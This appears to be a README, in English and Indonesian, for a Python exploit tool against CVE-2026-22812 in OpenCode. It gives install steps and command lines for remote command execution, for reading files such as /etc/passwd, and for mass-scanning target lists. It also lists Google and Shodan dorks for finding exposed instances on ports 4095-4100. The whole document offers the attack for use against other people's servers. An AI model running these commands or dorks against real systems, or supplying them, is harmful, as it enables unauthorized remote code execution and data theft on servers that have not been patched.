
Python tool to check and exploit CVE-2026-22812 in OpenCode, supporting command execution, file read, and multi-target scanning on ports 4095-4100.
OpenCode CVE-2026-22812 Exploiter Simple Python tols to check and exploit OpenCode vulnerability (CVE-2026-22812).
Install
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
Basic Usage
# Check single target
python rce.py -u http://target:4096 --check
# Execute command
python rce.py -u http://target:4096 -c "whoami"
# Read file
python rce.py -u http://target:4096 --read-file /etc/passwd
# Scan multiple targets
python rce.py -l targets.txt --check
# Other
python rce.py --help
Search Dorks
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
Default Ports: 4095-4100
Tols Python sederhana untuk cek dan eksploit kerentanan OpenCode (CVE-2026-22812).
Instalasi:
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
Penggunaan Dasar
# Cek target tunggal
python rce.py -u http://target:4096 --check
# Eksekusi perintah
python rce.py -u http://target:4096 -c "whoami"
# Baca file
python rce.py -u http://target:4096 --read-file /etc/passwd
# Scan banyak target
python rce.py -l targets.txt --check
# Lainnya
Dork Pencarian:
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
Port Default: 4095-4100